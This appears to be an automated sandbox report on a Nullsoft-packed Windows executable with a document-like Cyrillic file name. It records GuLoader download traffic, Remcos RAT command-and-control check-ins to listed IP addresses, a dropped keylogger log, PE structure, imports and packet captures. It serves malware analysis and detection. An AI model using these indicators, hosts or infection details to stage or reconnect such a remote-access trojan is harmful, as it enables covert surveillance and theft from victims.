                                                                                                                                                                                                                  Preview:..{.......@...[......4....F.../_..I..<.:.,.WU....t.Tr.........!......Q).Z.....................#[g..........<|%.P..............|@.....5.........5............../.....S...............].......b...+..........u.............Yr....../......?y.....[....q.>.e.............^.......O.W..1..2.w.........."....\Ya....Jm.kJ.3....#..........V..........i2...G.6w..).....w...........o.Yi.;-......a..."~...4...ip>..8...a.......#.......f...........4[.b.X%c......7Y.T....h[.'._....em.........dF.......2.nm........M..h....8.{N.O.........^k................p.........R....L........b..WT..E.../..2..........b.......q...................n...J.........\.....s.$....0............).......x...........&................y........:.............m..................=..%...........6...<51..................N..;......'S...5.Q......\..B........}.`..7......B..Z........r......j.....*...W......K..s................{....Z........d..\.........x.........%..FVOr...+.....k....|...D...!..F.<.W....e....|......................

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\paqlgkfs.dat

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):598
                                                                                                                                                                                                                  Entropy (8bit):3.480871781297124
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:KlrlCDecmlrlEAbWFe5ElrlAlrl4IbWItN2OAMy4tN2X5y4tN2nkl:+kScS7WqMSvWItXy4tMy4t5l
                                                                                                                                                                                                                  MD5:3C154083398484D114BC182C9F83BEE9
                                                                                                                                                                                                                  SHA1:216DCC307DB1B08D56EB59874EB495CE6580EED8
                                                                                                                                                                                                                  SHA-256:B1B21275B354BA87FF1721BA030558F7B3A9BDE1C36A2AF2526DB8473BE1B314
                                                                                                                                                                                                                  SHA-512:256E33C31942AA67AA33D616A1ECB601A6764054E9492A6F5038FD309F0180089A7EEBE56ECEAF4521B8AD197B12FEFA2800A6DF55BEDD5640CC7DA0AC8E7C39
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
                                                                                                                                                                                                                  Preview:....[.2.0.2.3./.1.0./.2.6. .1.4.:.2.8.:.4.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.3./.1.0./.2.6. .1.4.:.2.8.:.4.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.3./.1.0./.2.6. .1.4.:.2.8.:.5.0. .R.u.n.].........[.2.0.2.3./.1.0./.2.6. .1.4.:.2.8.:.5.4. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .6.7.9.1.2. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .3.0.7.4. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .6.5.8.0.6. .m.i.n.u.t.e.s. .}.....

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                  Entropy (8bit):7.553222139454719
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                  File name:#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File size:734'679 bytes
                                                                                                                                                                                                                  MD5:8b1422d6b17dd727c69291aa1ff09481
                                                                                                                                                                                                                  SHA1:b09ac93ef0313867a755e59cf4b108ee5b376754
                                                                                                                                                                                                                  SHA256:f08ab03484809d162963cf54a40b81f7722a83984744ecc79f4626b75b829b46
                                                                                                                                                                                                                  SHA512:13f4dcb158de69339cb6dff93cd29ec92caecbbb0cf49c0fd9a605cdf8796f3b851201e80c6579220e93a445a59328741b5dd58e3c7f94b1173caa566b0dae7c
                                                                                                                                                                                                                  SSDEEP:12288:uJWNBQfagdRGe/kEZusRW2FDipfAXRJ8+2FRAjI9XLvlDwLEuSflue6VfFtqdXFa:uWW6rE6MqY6VujkbvFHfluNtqdXFa
                                                                                                                                                                                                                  TLSH:0FF4E1216B29F903E2F113F48567DFAA7B218D150D3B963386A4EF2B78FC3911D19216
                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:4dcdeeee7d595823

                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Entrypoint:0x40338f
                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                  Time Stamp:0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                  Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                                                  mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                  mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                                                                                                  cmp ax, 00000006h
                                                                                                                                                                                                                  mov dword ptr [00434EECh], eax
                                                                                                                                                                                                                  je 00007F5AF862E853h
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  call 00007F5AF8631B05h
                                                                                                                                                                                                                  cmp eax, ebx
                                                                                                                                                                                                                  je 00007F5AF862E849h
                                                                                                                                                                                                                  push 00000C00h
                                                                                                                                                                                                                  call eax
                                                                                                                                                                                                                  mov esi, 004082B0h
                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                  call 00007F5AF8631A7Fh
                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                  call dword ptr [00408150h]
                                                                                                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                  cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                  jne 00007F5AF862E82Ch
                                                                                                                                                                                                                  push 0000000Ah
                                                                                                                                                                                                                  call 00007F5AF8631AD8h
                                                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                                                  call 00007F5AF8631AD1h
                                                                                                                                                                                                                  push 00000006h
                                                                                                                                                                                                                  mov dword ptr [00434EE4h], eax
                                                                                                                                                                                                                  call 00007F5AF8631AC5h
                                                                                                                                                                                                                  cmp eax, ebx
                                                                                                                                                                                                                  je 00007F5AF862E851h
                                                                                                                                                                                                                  push 0000001Eh
                                                                                                                                                                                                                  call eax
                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                  je 00007F5AF862E849h
                                                                                                                                                                                                                  or byte ptr [00434EEFh], 00000040h
                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  call dword ptr [004082A0h]
                                                                                                                                                                                                                  mov dword ptr [00434FB8h], eax
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                  push 000002B4h
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  push 0042B208h
                                                                                                                                                                                                                  call dword ptr [00408188h]
                                                                                                                                                                                                                  push 0040A2C8h

                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7f0000x2adb8.rsrc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                  .text0x10000x66270x6800False0.6643629807692307data6.451784672975888IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .rdata0x80000x14a20x1600False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .data0xa0000x2aff80x600False0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                  .ndata0x350000x4a0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                  .rsrc0x7f0000x2adb80x2ae00False0.2931623542274053data4.844476982593675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                  RT_BITMAP0x7f4900x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                                                                                  RT_ICON0x7f7f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.25415532946882763
                                                                                                                                                                                                                  RT_ICON0x900200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3174795038890057
                                                                                                                                                                                                                  RT_ICON0x994c80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.3372458410351202
                                                                                                                                                                                                                  RT_ICON0x9e9500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.30196032120925836
                                                                                                                                                                                                                  RT_ICON0xa2b780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.37105809128630707
                                                                                                                                                                                                                  RT_ICON0xa51200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.41135084427767354
                                                                                                                                                                                                                  RT_ICON0xa61c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.35954157782515994
                                                                                                                                                                                                                  RT_ICON0xa70700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5004098360655738
                                                                                                                                                                                                                  RT_ICON0xa79f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.35333935018050544
                                                                                                                                                                                                                  RT_ICON0xa82a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.35023041474654376
                                                                                                                                                                                                                  RT_ICON0xa89680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.26372832369942195
                                                                                                                                                                                                                  RT_ICON0xa8ed00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5647163120567376
                                                                                                                                                                                                                  RT_DIALOG0xa93380x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                                                                                  RT_DIALOG0xa94800x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                                                                                  RT_DIALOG0xa95c00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                  RT_DIALOG0xa96c00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                  RT_DIALOG0xa97e00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                  RT_GROUP_ICON0xa98400xaedataEnglishUnited States0.6609195402298851
                                                                                                                                                                                                                  RT_VERSION0xa98f00x178VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79EnglishUnited States0.5664893617021277
                                                                                                                                                                                                                  RT_MANIFEST0xa9a680x34eXML 1.0 document, ASCII text, with very long lines (846), with no line terminatorsEnglishUnited States0.5141843971631206

                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                  KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                                                  USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  192.168.11.20217.147.225.6950054802855192 10/26/23-14:28:47.709544TCP2855192ETPRO TROJAN GuLoader Encoded Binary Request M25005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  94.156.6.253192.168.11.202402500552032777 10/26/23-14:35:12.486265TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  192.168.11.2094.156.6.2535005524022032776 10/26/23-14:28:50.518465TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin500552402192.168.11.2094.156.6.253

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.405352116 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.708215952 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.708528996 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.709543943 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.012311935 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015140057 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015237093 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015315056 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015335083 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015393972 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015440941 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015477896 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015559912 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015595913 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015677929 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015711069 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015793085 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015872955 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015918016 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015971899 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015986919 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.016060114 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.016153097 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.016258955 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.016307116 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.318902016 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319170952 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319199085 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319366932 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319530010 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319650888 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319685936 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319737911 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319813013 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319894075 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.319933891 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320050001 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320102930 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320204973 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320278883 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320384979 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320441961 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320478916 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320614100 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320637941 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320724010 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320776939 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320796013 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.320902109 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321002960 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321018934 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321090937 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321156025 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321156025 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321206093 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321237087 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321310997 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321330070 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321362019 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321434021 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321456909 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321540117 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321583986 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321635008 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.321713924 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.622256994 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.622356892 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.622526884 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.622652054 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.624722958 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.624821901 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.624897957 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625016928 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625045061 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625072956 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625201941 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625226021 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625386953 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625397921 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625538111 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625583887 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625708103 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625746965 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625878096 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.625901937 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.626070976 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.626096964 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.626240015 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.626269102 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.626446009 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.626452923 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.626595974 CEST8050054217.147.225.69192.168.11.20
